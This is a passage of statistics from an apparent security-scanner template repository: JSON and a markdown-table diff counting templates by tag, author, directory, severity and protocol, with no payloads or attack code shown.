ount":1},{"name":"traefik","count":1},{"name":"iceflow","count":1},{"name":"biometrics","count":1},{"name":"springframework","count":1},{"name":"sql","count":1},{"name":"oidc","count":1},{"name":"jsp","count":1},{"name":"kyan","count":1},{"name":"adb","count":1},{"name":"webftp","count":1},{"name":"phpinfo","count":1},{"name":"clusterengine","count":1},{"name":"argussurveillance","count":1},{"name":"cherokee","count":1},{"name":"discord","count":1},{"name":"werkzeug","count":1},{"name":"exacqvision","count":1},{"name":"alerta","count":1},{"name":"wazuh","count":1},{"name":"froxlor","count":1},{"name":"clink-office","count":1},{"name":"wondercms","count":1},{"name":"centos","count":1},{"name":"codeigniter","count":1},{"name":"memcached","count":1},{"name":"lotus","count":1},{"name":"svn","count":1},{"name":"clave","count":1},{"name":"idemia","count":1},{"name":"chinaunicom","count":1},{"name":"moinmoin","count":1},{"name":"thinkadmin","count":1},{"name":"vidyo","count":1},{"name":"beanstalk","count":1},{"name":"redis","count":1},{"name":"aura","count":1},{"name":"mantis","count":1},{"name":"twitter-server","count":1},{"name":"websphere","count":1},{"name":"luftguitar","count":1},{"name":"viewlinc","count":1},{"name":"announcekit","count":1},{"name":"qdpm","count":1},{"name":"timesheet","count":1},{"name":"fastcgi","count":1},{"name":"yachtcontrol","count":1},{"name":"anchorcms","count":1},{"name":"terraform","count":1},{"name":"node-red-dashboard","count":1},{"name":"aspnuke","count":1},{"name":"acme","count":1},{"name":"xampp","count":1},{"name":"ems","count":1},{"name":"camunda","count":1},{"name":"szhe","count":1},{"name":"sophos","count":1},{"name":"vsphere","count":1},{"name":"htmli","count":1},{"name":"nps","count":1},{"name":"cerebro","count":1},{"name":"rocketchat","count":1},{"name":"phpunit","count":1},{"name":"hiboss","count":1},{"name":"vcenter","count":1},{"name":"mediumish","count":1},{"name":"openstack","count":1},{"name":"ewebs","count":1},{"name":"netgenie","count":1},{"name":"extractor","count":1},{"name":"elfinder","count":1},{"name":"glowroot","count":1},{"name":"blue-ocean","count":1},{"name":"synnefo","count":1},{"name":"uwsgi","count":1},{"name":"accela","count":1},{"name":"phpfastcache","count":1},{"name":"payara","count":1},{"name":"opensmtpd","count":1},{"name":"pacsone","count":1},{"name":"hortonworks","count":1},{"name":"mpsec","count":1},{"name":"spidercontrol","count":1},{"name":"gstorage","count":1},{"name":"kerbynet","count":1},{"name":"frontpage","count":1},{"name":"salesforce","count":1},{"name":"addpac","count":1},{"name":"vsftpd","count":1},{"name":"openx","count":1},{"name":"landray","count":1},{"name":"ulterius","count":1},{"name":"panasonic","count":1},{"name":"blind","count":1},{"name":"mobileiron","count":1},{"name":"fiori","count":1},{"name":"webadmin","count":1},{"name":"dbeaver","count":1},{"name":"basic-auth","count":1},{"name":"meraki","count":1},{"name":"csod","count":1},{"name":"tenda","count":1},{"name":"circontrorl","count":1},{"name":"jfrog","count":1},{"name":"etouch","count":1},{"name":"stem","count":1},{"name":"tensorboard","count":1},{"name":"plastic","count":1},{"name":"artica","count":1},{"name":"resourcespace","count":1},{"name":"klog","count":1},{"name":"wmt","count":1},{"name":"logontracer","count":1},{"name":"netmask","count":1},{"name":"gridx","count":1},{"name":"shoretel","count":1},{"name":"nette","count":1},{"name":"elascticsearch","count":1},{"name":"varnish","count":1},{"name":"wamp","count":1},{"name":"maxsite","count":1},{"name":"comodo","count":1},{"name":"javamelody","count":1},{"name":"nomad","count":1},{"name":"cobub","count":1},{"name":"flink","count":1},{"name":"mongo","count":1},{"name":"finereport","count":1},{"name":"panos","count":1},{"name":"influxdb","count":1},{"name":"sidekiq","count":1},{"name":"monitorr","count":1},{"name":"fortilogger","count":1},{"name":"tamronos","count":1},{"name":"commscope","count":1},{"name":"graylog","count":1},{"name":"opencast","count":1},{"name":"pgadmin","count":1},{"name":"calendarix","count":1},{"name":"websvn","count":1},{"name":"bedita","count":1},{"name":"smi","count":1},{"name":"drone","count":1},{"name":"monitorix","count":1},{"name":"fortigates","count":1},{"name":"sqlite","count":1},{"name":"burp","count":1},{"name":"pagespeed","count":1},{"name":"ntopng","count":1},{"name":"erp-nc","count":1},{"name":"primetek","count":1},{"name":"phpwiki","count":1},{"name":"ognl","count":1},{"name":"octobercms","count":1},{"name":"scs","count":1},{"name":"zyxel","count":1},{"name":"lighttpd","count":1},{"name":"nc2","count":1},{"name":"omi","count":1},{"name":"couchbase","count":1},{"name":"mara","count":1},{"name":"postgres","count":1},{"name":"craftcms","count":1},{"name":"achecker","count":1},{"name":"plc","count":1},{"name":"domxss","count":1},{"name":"kubeflow","count":1},{"name":"jquery","count":1},{"name":"zenario","count":1},{"name":"empirecms","count":1},{"name":"maccmsv10","count":1},{"name":"robomongo","count":1},{"name":"xiuno","count":1},{"name":"fedora","count":1},{"name":"ioncube","count":1},{"name":"wifisky","count":1},{"name":"ssl","count":1},{"name":"redwood","count":1},{"name":"zeroshell","count":1},{"name":"lg-nas","count":1},{"name":"woocommerce","count":1},{"name":"turbocrm","count":1},{"name":"zend","count":1},{"name":"dompdf","count":1},{"name":"scimono","count":1},{"name":"codemeter","count":1},{"name":"shiro","count":1},{"name":"gitea","count":1},{"name":"gunicorn","count":1},{"name":"redcap","count":1},{"name":"74cms","count":1},{"name":"opentsdb","count":1},{"name":"interlib","count":1},{"name":"mirai","count":1},{"name":"visionhub","count":1},{"name":"qvisdvr","count":1},{"name":"gilacms","count":1},{"name":"nedi","count":1},{"name":"bolt","count":1},{"name":"solarlog","count":1},{"name":"ecom","count":1},{"name":"chevereto","count":1},{"name":"zm","count":1},{"name":"iptime","count":1},{"name":"concrete","count":1},{"name":"s3","count":1},{"name":"optiLink","count":1},{"name":"dotnetnuke","count":1},{"name":"checkpoint","count":1},{"name":"circontrol","count":1},{"name":"triconsole","count":1},{"name":"viewpoint","count":1},{"name":"phalcon","count":1},{"name":"xunchi","count":1},{"name":"vscode","count":1},{"name":"default","count":1},{"name":"kindeditor","count":1},{"name":"gespage","count":1},{"name":"ghost","count":1},{"name":"nuxeo","count":1},{"name":"diris","count":1},{"name":"mdb","count":1},{"name":"swagger","count":1},{"name":"soar","count":1},{"name":"visualtools","count":1},{"name":"ganglia","count":1},{"name":"keenetic","count":1},{"name":"miscrsoft","count":1},{"name":"st","count":1},{"name":"cockpit","count":1},{"name":"ruckus","count":1},{"name":"linksys","count":1},{"name":"okta","count":1},{"name":"jenzabar","count":1},{"name":"dnssec","count":1},{"name":"expn","count":1},{"name":"esmtp","count":1},{"name":"setup","count":1},{"name":"mysql","count":1},{"name":"timeclock","count":1},{"name":"tjws","count":1},{"name":"wavemaker","count":1},{"name":"processmaker","count":1},{"name":"shopizer","count":1},{"name":"acexy","count":1},{"name":"majordomo2","count":1},{"name":"eyou","count":1},{"name":"graphite","count":1},{"name":"mariadb","count":1},{"name":"gurock","count":1},{"name":"fortiweb","count":1},{"name":"csrf","count":1},{"name":"phpfusion","count":1},{"name":"jitsi","count":1},{"name":"myucms","count":1},{"name":"plone","count":1},{"name":"tectuus","count":1},{"name":"cocoon","count":1},{"name":"linkedin","count":1},{"name":"gitlist","count":1},{"name":"ilo4","count":1},{"name":"simplecrm","count":1},{"name":"wiki","count":1},{"name":"xvr","count":1},{"name":"sourcebans","count":1},{"name":"woocomernce","count":1},{"name":"alertmanager","count":1},{"name":"shopware","count":1},{"name":"socomec","count":1},{"name":"nuuo","count":1},{"name":"glances","count":1},{"name":"labtech","count":1},{"name":"api-manager","count":1},{"name":"sco","count":1},{"name":"zte","count":1},{"name":"rdp","count":1},{"name":"eg","count":1},{"name":"panabit","count":1},{"name":"clockwork","count":1},{"name":"rhymix","count":1},{"name":"bitly","count":1},{"name":"gogs","count":1},{"name":"upload","count":1},{"name":"zzzcms","count":1},{"name":"tapestry","count":1},{"name":"ambari","count":1},{"name":"tensorflow","count":1},{"name":"perl","count":1},{"name":"b2evolution","count":1},{"name":"rubedo","count":1},{"name":"ueditor","count":1},{"name":"zmanda","count":1},{"name":"dvwa","count":1},{"name":"netrc","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":263},{"name":"daffainfo","count":216},{"name":"pdteam","count":196},{"name":"geeknik","count":153},{"name":"dwisiswant0","count":131},{"name":"gy741","count":75},{"name":"pussycat0x","count":68},{"name":"princechaddha","count":61},{"name":"madrobot","count":61},{"name":"0x_akoko","count":42},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"harshbothra_","count":7},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"elsfa7110","count":5},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"lu4nx","count":4},{"name":"xelkomy","count":4},{"name":"skeltavik","count":3},{"name":"binaryfigments","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"dudez","count":3},{"name":"mavericknerd","count":3},{"name":"_generic_human_","count":3},{"name":"idealphase","count":3},{"name":"shifacyclewala","count":3},{"name":"0w4ys","count":3},{"name":"tess","count":3},{"name":"emenalf","count":3},{"name":"f1tz","count":3},{"name":"thomas_from_offensity","count":3},{"name":"unstabl3","count":3},{"name":"vsh00t","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"jarijaas","count":3},{"name":"sushantkamble","count":3},{"name":"johnk3r","count":3},{"name":"incogbyte","count":3},{"name":"fyoorer","count":3},{"name":"bing0o","count":2},{"name":"lotusdll","count":2},{"name":"bsysop","count":2},{"name":"x1m_martijn","count":2},{"name":"whoever","count":2},{"name":"huowuzhao","count":2},{"name":"alifathi-h1","count":2},{"name":"vavkamil","count":2},{"name":"ree4pwn","count":2},{"name":"0xelkomy","count":2},{"name":"0xprial","count":2},{"name":"gal nagli","count":2},{"name":"fabaff","count":2},{"name":"r3naissance","count":2},{"name":"swissky","count":2},{"name":"amsda","count":2},{"name":"g4l1t0","count":2},{"name":"bernardofsr","count":2},{"name":"0xsmiley","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"udit_thakkur","count":2},{"name":"gevakun","count":2},{"name":"convisoappsec","count":2},{"name":"zomsop82","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"socketz","count":2},{"name":"mohammedsaneem","count":2},{"name":"manas_harsh","count":2},{"name":"kiblyn11","count":2},{"name":"joeldeleep","count":2},{"name":"0xrudra","count":2},{"name":"bp0lr","count":2},{"name":"parth","count":2},{"name":"davidmckennirey","count":2},{"name":"moritz nentwig","count":2},{"name":"johnjhacking","count":2},{"name":"cocxanh","count":2},{"name":"random-robbie","count":2},{"name":"afaq","count":2},{"name":"w4cky_","count":2},{"name":"pxmme1337","count":2},{"name":"0xsapra","count":2},{"name":"nkxxkn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xcrypto","count":2},{"name":"ehsahil","count":2},{"name":"hahwul","count":2},{"name":"randomrobbie","count":2},{"name":"arcc","count":2},{"name":"koti2","count":2},{"name":"mass0ma","count":1},{"name":"brabbit10","count":1},{"name":"zandros0","count":1},{"name":"shifacyclewla","count":1},{"name":"sshell","count":1},{"name":"fopina","count":1},{"name":"sicksec","count":1},{"name":"bjhulst","count":1},{"name":"rotemreiss","count":1},{"name":"juicypotato1","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"evolutionsec","count":1},{"name":"jteles","count":1},{"name":"elder tao","count":1},{"name":"andirrahmani1","count":1},{"name":"jeya seelan","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"izn0u","count":1},{"name":"adrianmf","count":1},{"name":"me9187","count":1},{"name":"udyz","count":1},{"name":"dawid-czarnecki","count":1},{"name":"0xteles","count":1},{"name":"shelld3v","count":1},{"name":"rojanrijal","count":1},{"name":"alex","count":1},{"name":"thezakman","count":1},{"name":"smaranchand","count":1},{"name":"manuelbua","count":1},{"name":"affix","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"d0rkerdevil","count":1},{"name":"b0rn2r00t","count":1},{"name":"yavolo","count":1},{"name":"revblock","count":1},{"name":"_c0wb0y_","count":1},{"name":"c3l3si4n","count":1},{"name":"retr0","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ahmetpergamum","count":1},{"name":"b4uh0lz","count":1},{"name":"52971","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sullo","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"streetofhackerr007","count":1},{"name":"fmunozs","count":1},{"name":"xstp","count":1},{"name":"_harleo","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"alperenkesk","count":1},{"name":"yashgoti","count":1},{"name":"tim_koopmans","count":1},{"name":"kre80r","count":1},{"name":"luskabol","count":1},{"name":"tirtha_mandal","count":1},{"name":"andysvints","count":1},{"name":"j33n1k4","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"omarkurt","count":1},{"name":"0xtavian","count":1},{"name":"remonsec","count":1},{"name":"qlkwej","count":1},{"name":"shreyapohekar","count":1},{"name":"pudsec","count":1},{"name":"chron0x","count":1},{"name":"x6263","count":1},{"name":"mubassirpatel","count":1},{"name":"kabirsuda","count":1},{"name":"thevillagehacker","count":1},{"name":"vzamanillo","count":1},{"name":"pratik khalane","count":1},{"name":"furkansenan","count":1},{"name":"borna nematzadeh","count":1},{"name":"its0x08","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"elmahdi","count":1},{"name":"mesaglio","count":1},{"name":"sickwell","count":1},{"name":"soyelmago","count":1},{"name":"yashanand155","count":1},{"name":"ldionmarcil","count":1},{"name":"schniggie","count":1},{"name":"ooooooo_q","count":1},{"name":"iampritam","count":1},{"name":"ilovebinbash","count":1},{"name":"bad5ect0r","count":1},{"name":"un-fmunozs","count":1},{"name":"naglinagli","count":1},{"name":"knassar702","count":1},{"name":"@dwisiswant0","count":1},{"name":"cookiehanhoan","count":1},{"name":"ohlinge","count":1},{"name":"luci","count":1},{"name":"pdp","count":1},{"name":"philippdelteil","count":1},{"name":"0ut0fb4nd","count":1},{"name":"noamrathaus","count":1},{"name":"s1r1u5_","count":1},{"name":"hakluke","count":1},{"name":"micha3lb3n","count":1},{"name":"deena","count":1},{"name":"hanlaomo","count":1},{"name":"_darrenmartyn","count":1},{"name":"absshax","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ringo","count":1},{"name":"nerrorsec","count":1},{"name":"mhdsamx","count":1},{"name":"zhenwarx","count":1},{"name":"rodnt","count":1},{"name":"patralos","count":1},{"name":"undefl0w","count":1},{"name":"b0yd","count":1},{"name":"oscarintherocks","count":1},{"name":"berkdusunur","count":1},{"name":"whynotke","count":1},{"name":"akshansh","count":1},{"name":"aresx","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"apt-mirror","count":1},{"name":"daviey","count":1},{"name":"defr0ggy","count":1},{"name":"taielab","count":1},{"name":"blckraven","count":1},{"name":"mah3sec_","count":1},{"name":"gboddin","count":1},{"name":"akash.c","count":1},{"name":"infosecsanyam","count":1},{"name":"wabafet","count":1},{"name":"ahmed sherif","count":1},{"name":"willd96","count":1},{"name":"sy3omda","count":1},{"name":"regala_","count":1},{"name":"alph4byt3","count":1},{"name":"notsoevilweasel","count":1},{"name":"sec_hawk","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"push4d","count":1},{"name":"geraldino2","count":1},{"name":"th3.d1p4k","count":1},{"name":"0xrod","count":1},{"name":"kareemse1im","count":1},{"name":"intx0x80","count":1},{"name":"ipanda","count":1},{"name":"ajaysenr","count":1},{"name":"kurohost","count":1},{"name":"raesene","count":1},{"name":"nytr0gen","count":1},{"name":"becivells","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"toufik airane","count":1},{"name":"bolli95","count":1},{"name":"makyotox","count":1},{"name":"0h1in9e","count":1},{"name":"exploitation","count":1},{"name":"co0nan","count":1},{"name":"petruknisme","count":1},{"name":"divya_mudgal","count":1},{"name":"flag007","count":1}],"directory":[{"name":"cves","count":731},{"name":"vulnerabilities","count":307},{"name":"exposed-panels","count":250},{"name":"technologies","count":192},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":33},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":650},{"name":"high","count":558},{"name":"medium","count":451},{"name":"critical","count":276},{"name":"low","count":153}],"types":[{"name":"http","count":1983},{"name":"file","count":46},{"name":"network","count":42},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 4db6036e00..36b33f7526 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,818 +1,823 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 | -| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 | -| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 | -| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 | -| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | -| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 198 | gy741 | 72 | takeovers | 64 | | | | | -| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | | +| cve | 731 | pikpikcu | 273 | cves | 731 | info | 650 | http | 1983 | +| lfi | 265 | dhiyaneshdk | 263 | vulnerabilities | 307 | high | 558 | file | 46 | +| panel | 252 | daffainfo | 216 | exposed-panels | 250 | medium | 451 | network | 42 | +| xss | 246 | pdteam | 196 | technologies | 192 | critical | 276 | dns | 12 | +| exposure | 233 | geeknik | 153 | exposures | 188 | low | 153 | | | +| wordpress | 229 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 199 | gy741 | 75 | takeovers | 64 | | | | | +| tech | 183 | pussycat0x | 68 | default-logins | 56 | | | | | | cve2020 | 164 | madrobot | 61 | file | 46 | | | | | -| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | -| cve2021 | 127 | gaurang | 42 | network | 32 | | | | | -| cve2019 | 96 | 0x_akoko | 39 | miscellaneous | 24 | | | | | -| config | 94 | ice3man | 26 | iot | 23 | | | | | -| cve2018 | 85 | philippedelteil | 25 | dns | 12 | | | | | +| wp-plugin | 155 | princechaddha | 61 | workflows | 37 | | | | | +| cve2021 | 130 | 0x_akoko | 42 | network | 33 | | | | | +| cve2019 | 96 | gaurang | 42 | iot | 25 | | | | | +| config | 94 | philippedelteil | 27 | miscellaneous | 24 | | | | | +| cve2018 | 86 | ice3man | 26 | dns | 12 | | | | | | joomla | 79 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 70 | sheikhrishad | 15 | cnvd | 9 | | | | | -| cve2010 | 69 | milo2012 | 14 | headless | 5 | | | | | -| takeover | 68 | pr3r00t | 14 | | | | | | | -| token | 65 | techbrunchfr | 13 | | | | | | | -| default-login | 63 | suman_kar | 12 | | | | | | | -| iot | 62 | r3dg33k | 11 | | | | | | | -| oob | 53 | cyllective | 11 | | | | | | | -| cve2017 | 50 | righettod | 10 | | | | | | | -| unauth | 47 | wdahlenb | 10 | | | | | | | +| cve2010 | 69 | pr3r00t | 14 | headless | 5 | | | | | +| takeover | 68 | milo2012 | 14 | | | | | | | +| iot | 66 | techbrunchfr | 13 | | | | | | | +| token | 65 | suman_kar | 12 | | | | | | | +| default-login | 63 | cyllective | 11 | | | | | | | +| oob | 55 | r3dg33k | 11 | | | | | | | +| cve2017 | 50 | wdahlenb | 10 | | | | | | | +| unauth | 47 | righettod | 10 | | | | | | | | file | 46 | random_robbie | 10 | | | | | | | -| network | 41 | hackergautam | 9 | | | | | | | +| network | 42 | nadino | 9 | | | | | | | | sqli | 38 | melbadry9 | 9 | | | | | | | -| ssrf | 37 | nadino | 9 | | | | | | | -| oracle | 36 | that_juan_ | 8 | | | | | | | +| ssrf | 38 | hackergautam | 9 | | | | | | | +| | 37 | that_juan_ | 8 | | | | | | | +| oracle | 36 | iamthefrogy | 8 | | | | | | | | cve2016 | 36 | aashiq | 8 | | | | | | | -| | 36 | iamthefrogy | 8 | | | | | | | -| redirect | 33 | kophjager007 | 7 | | | | | | | -| logs | 30 | randomstr1ng | 7 | | | | | | | -| jira | 28 | emadshanab | 7 | | | | | | | +| redirect | 33 | harshbothra_ | 7 | | | | | | | +| logs | 30 | emadshanab | 7 | | | | | | | +| jira | 28 | randomstr1ng | 7 | | | | | | | | atlassian | 27 | techryptic (@tech) | 7 | | | | | | | -| listing | 27 | dr_set | 7 | | | | | | | -| misc | 23 | dogasantos | 7 | | | | | | | -| cve2015 | 23 | 0x240x23elu | 7 | | | | | | | -| disclosure | 21 | harshbothra_ | 7 | | | | | | | -| auth-bypass | 20 | oppsec | 7 | | | | | | | -| generic | 20 | meme-lord | 7 | | | | | | | -| cisco | 19 | caspergn | 6 | | | | | | | -| router | 19 | logicalhunter | 6 | | | | | | | +| listing | 27 | oppsec | 7 | | | | | | | +| cve2015 | 24 | kophjager007 | 7 | | | | | | | +| misc | 23 | 0x240x23elu | 7 | | | | | | | +| disclosure | 22 | dogasantos | 7 | | | | | | | +| auth-bypass | 21 | dr_set | 7 | | | | | | | +| generic | 21 | meme-lord | 7 | | | | | | | | aem | 19 | __fazal | 6 | | | | | | | -| misconfig | 18 | pentest_swissky | 6 | | | | | | | -| sap | 18 | puzzlepeaches | 6 | | | | | | | -| cve2014 | 18 | elsfa7110 | 5 | | | | | | | -| debug | 18 | rootxharsh | 5 | | | | | | | +| router | 19 | puzzlepeaches | 6 | | | | | | | +| cisco | 19 | pentest_swissky | 6 | | | | | | | +| cve2014 | 19 | logicalhunter | 6 | | | | | | | +| debug | 18 | caspergn | 6 | | | | | | | +| sap | 18 | ganofins | 5 | | | | | | | +| misconfig | 18 | yanyun | 5 | | | | | | | | springboot | 18 | panch0r3d | 5 | | | | | | | -| php | 16 | yanyun | 5 | | | | | | | -| fuzz | 14 | ganofins | 5 | | | | | | | -| struts | 14 | iamnoooob | 5 | | | | | | | +| php | 16 | iamnoooob | 5 | | | | | | | | weblogic | 14 | joanbono | 5 | | | | | | | +| struts | 14 | elsfa7110 | 5 | | | | | | | +| fuzz | 14 | rootxharsh | 5 | | | | | | | +| cve2011 | 14 | lu4nx | 4 | | | | | | | | login | 14 | nodauf | 4 | | | | | | | -| cve2011 | 14 | xelkomy | 4 | | | | | | | -| cve2012 | 14 | e_schultze_ | 4 | | | | | | | -| adobe | 13 | lu4nx | 4 | | | | | | | +| cve2012 | 14 | xelkomy | 4 | | | | | | | | devops | 13 | github.com/its0x08 | 4 | | | | | | | -| dns | 13 | johnk3r | 3 | | | | | | | -| zoho | 13 | unstabl3 | 3 | | | | | | | -| android | 13 | jarijaas | 3 | | | | | | | -| jenkins | 12 | shifacyclewala | 3 | | | | | | | -| dlink | 12 | incogbyte | 3 | | | | | | | -| aws | 12 | vsh00t | 3 | | | | | | | -| manageengine | 12 | tess | 3 | | | | | | | -| cve2013 | 11 | thomas_from_offensity | 3 | | | | | | | -| wp-theme | 11 | impramodsargar | 3 | | | | | | | -| dell | 10 | fyoorer | 3 | | | | | | | -| xxe | 10 | z3bd | 3 | | | | | | | -| magento | 9 | mavericknerd | 3 | | | | | | | -| intrusive | 9 | 0w4ys | 3 | | | | | | | -| ftp | 9 | skeltavik | 3 | | | | | | | -| gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | -| scada | 8 | f1tz | 3 | | | | | | | -| rails | 8 | dudez | 3 | | | | | | | -| vmware | 8 | emenalf | 3 | | | | | | | -| ruijie | 8 | binaryfigments | 3 | | | | | | | -| cnvd | 8 | sushantkamble | 3 | | | | | | | -| airflow | 8 | _generic_human_ | 3 | | | | | | | -| nginx | 8 | idealphase | 3 | | | | | | | -| google | 7 | shine | 3 | | | | | | | -| ibm | 7 | johnjhacking | 2 | | | | | | | -| cms | 7 | whoever | 2 | | | | | | | -| backup | 7 | pxmme1337 | 2 | | | | | | | -| coldfusion | 7 | randomrobbie | 2 | | | | | | | -| microsoft | 7 | 0xcrypto | 2 | | | | | | | -| netgear | 7 | arcc | 2 | | | | | | | -| cve2009 | 7 | lotusdll | 2 | | | | | | | -| files | 7 | joeldeleep | 2 | | | | | | | -| confluence | 7 | amsda | 2 | | | | | | | -| kubernetes | 7 | g4l1t0 | 2 | | | | | | | -| api | 6 | manas_harsh | 2 | | | | | | | +| dns | 13 | e_schultze_ | 4 | | | | | | | +| android | 13 | idealphase | 3 | | | | | | | +| zoho | 13 | 0w4ys | 3 | | | | | | | +| adobe | 13 | binaryfigments | 3 | | | | | | | +| aws | 12 | johnk3r | 3 | | | | | | | +| dlink | 12 | skeltavik | 3 | | | | | | | +| jenkins | 12 | impramodsargar | 3 | | | | | | | +| manageengine | 12 | emenalf | 3 | | | | | | | +| wp-theme | 11 | dudez | 3 | | | | | | | +| cve2013 | 11 | z3bd | 3 | | | | | | | +| dell | 10 | jarijaas | 3 | | | | | | | +| xxe | 10 | mavericknerd | 3 | | | | | | | +| magento | 9 | tess | 3 | | | | | | | +| ftp | 9 | unstabl3 | 3 | | | | | | | +| intrusive | 9 | shifacyclewala | 3 | | | | | | | +| ruijie | 8 | sushantkamble | 3 | | | | | | | +| airflow | 8 | fyoorer | 3 | | | | | | | +| nginx | 8 | thomas_from_offensity | 3 | | | | | | | +| scada | 8 | vsh00t | 3 | | | | | | | +| vmware | 8 | _generic_human_ | 3 | | | | | | | +| cnvd | 8 | shine | 3 | | | | | | | +| rails | 8 | incogbyte | 3 | | | | | | | +| gitlab | 8 | f1tz | 3 | | | | | | | +| confluence | 7 | yash anand @yashanand155 | 3 | | | | | | | +| coldfusion | 7 | r3naissance | 2 | | | | | | | +| netgear | 7 | moritz nentwig | 2 | | | | | | | +| backup | 7 | 0xprial | 2 | | | | | | | +| google | 7 | bp0lr | 2 | | | | | | | +| kubernetes | 7 | lotusdll | 2 | | | | | | | +| cve2009 | 7 | huowuzhao | 2 | | | | | | | +| files | 7 | swissky | 2 | | | | | | | +| ibm | 7 | 0xelkomy | 2 | | | | | | | +| microsoft | 7 | alifathi-h1 | 2 | | | | | | | +| cms | 7 | fabaff | 2 | | | | | | | +| solr | 6 | afaq | 2 | | | | | | | +| camera | 6 | foulenzer | 2 | | | | | | | +| laravel | 6 | parth | 2 | | | | | | | +| docker | 6 | 0xrudra | 2 | | | | | | | +| cve2008 | 6 | cocxanh | 2 | | | | | | | | django | 6 | hetroublemakr | 2 | | | | | | | -| solr | 6 | davidmckennirey | 2 | | | | | | | -| laravel | 6 | 0xelkomy | 2 | | | | | | | -| rconfig | 6 | kiblyn11 | 2 | | | | | | | -| cve2008 | 6 | koti2 | 2 | | | | | | | -| citrix | 6 | bing0o | 2 | | | | | | | -| jetty | 6 | alifathi-h1 | 2 | | | | | | | -| docker | 6 | udit_thakkur | 2 | | | | | | | -| ssti | 5 | r3naissance | 2 | | | | | | | -| java | 5 | cocxanh | 2 | | | | | | | -| windows | 5 | hahwul | 2 | | | | | | | -| lucee | 5 | random-robbie | 2 | | | | | | | -| dedecms | 5 | socketz | 2 | | | | | | | +| jetty | 6 | x1m_martijn | 2 | | | | | | | +| citrix | 6 | udit_thakkur | 2 | | | | | | | +| rconfig | 6 | ehsahil | 2 | | | | | | | +| api | 6 | kiblyn11 | 2 | | | | | | | +| deserialization | 5 | johnjhacking | 2 | | | | | | | +| phpmyadmin | 5 | bsysop | 2 | | | | | | | +| java | 5 | pxmme1337 | 2 | | | | | | | +| tomcat | 5 | bing0o | 2 | | | | | | | +| fileupload | 5 | koti2 | 2 | | | | | | | +| dedecms | 5 | 0xsmiley | 2 | | | | | | | +| windows | 5 | amsda | 2 | | | | | | | +| headless | 5 | arcc | 2 | | | | | | | +| hp | 5 | nkxxkn | 2 | | | | | | | | circarlife | 5 | w4cky_ | 2 | | | | | | | -| printer | 5 | bernardofsr | 2 | | | | | | | -| phpmyadmin | 5 | x1m_martijn | 2 | | | | | | | -| hp | 5 | parth | 2 | | | | | | | -| iis | 5 | afaq | 2 | | | | | | | -| drupal | 5 | bsysop | 2 | | | | | | | -| headless | 5 | bp0lr | 2 | | | | | | | -| nodejs | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| deserialization | 5 | 0xprial | 2 | | | | | | | -| tomcat | 